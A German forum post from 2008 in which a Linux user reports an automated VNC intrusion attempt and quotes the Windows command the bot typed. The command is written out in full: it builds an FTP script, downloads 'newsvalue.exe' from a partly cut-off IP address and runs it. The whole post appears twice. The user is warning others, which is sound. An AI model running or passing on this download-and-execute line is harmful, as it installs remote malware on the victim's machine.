Unfug
2008-04-22, 21:08:29
Ich hab grad eine interessante "Begegnung" gehabt.
Zuerst bekam ich dieses PopUP Fenster:
http://img504.imageshack.us/img504/6189/bildschirmfotoaw0.th.jpg (http://img504.imageshack.us/my.php?image=bildschirmfotoaw0.jpg)
Das ist normal, da mein VNC Server so eingestellt ist. Aber ich wußte jetzt nichts davon, daß jemand rauf sollte.
Hab mir gedacht..Machste mal Texteditor auf und fragste was das Arschloch will.
Doch scheinbar war es ein automatisiertes System für Windows User (Bin aber Linux User :-D) und so bekam ich die Commandos in den Texteditor vom Script geschrieben und dann loggte sich diese Person/Bot/Script wieder aus.
Interessant war , daß das Scirpt scheinbar sogar automatisch "Start-ausführen" ausführen wollte (aber unter Linux ist das nunmal nicht da an der Stelle).
%systemroot%\system32\cmd.exe
del eq&echo open 85.182 32236 >> eq&echo user 14562 16715 >> eq &echo get newsvalue.exe >> eq &echo quit >> eq &ftp -n -s:eq &newsvalue.exe &del eq
Die IP ist abgehackt, weil ich da "leider" eine Taste gedrückt habe.
Diese Technik kannte ich noch nicht und wollte euch sie nicht vorenthalten.
Mal googlen, was diese "newsvalue" sein soll.
Bisher nichts brauchbares gefunden
Gruß
Zuerst bekam ich dieses PopUP Fenster:
http://img504.imageshack.us/img504/6189/bildschirmfotoaw0.th.jpg (http://img504.imageshack.us/my.php?image=bildschirmfotoaw0.jpg)
Das ist normal, da mein VNC Server so eingestellt ist. Aber ich wußte jetzt nichts davon, daß jemand rauf sollte.
Hab mir gedacht..Machste mal Texteditor auf und fragste was das Arschloch will.
Doch scheinbar war es ein automatisiertes System für Windows User (Bin aber Linux User :-D) und so bekam ich die Commandos in den Texteditor vom Script geschrieben und dann loggte sich diese Person/Bot/Script wieder aus.
Interessant war , daß das Scirpt scheinbar sogar automatisch "Start-ausführen" ausführen wollte (aber unter Linux ist das nunmal nicht da an der Stelle).
%systemroot%\system32\cmd.exe
del eq&echo open 85.182 32236 >> eq&echo user 14562 16715 >> eq &echo get newsvalue.exe >> eq &echo quit >> eq &ftp -n -s:eq &newsvalue.exe &del eq
Die IP ist abgehackt, weil ich da "leider" eine Taste gedrückt habe.
Diese Technik kannte ich noch nicht und wollte euch sie nicht vorenthalten.
Mal googlen, was diese "newsvalue" sein soll.
Bisher nichts brauchbares gefunden
Gruß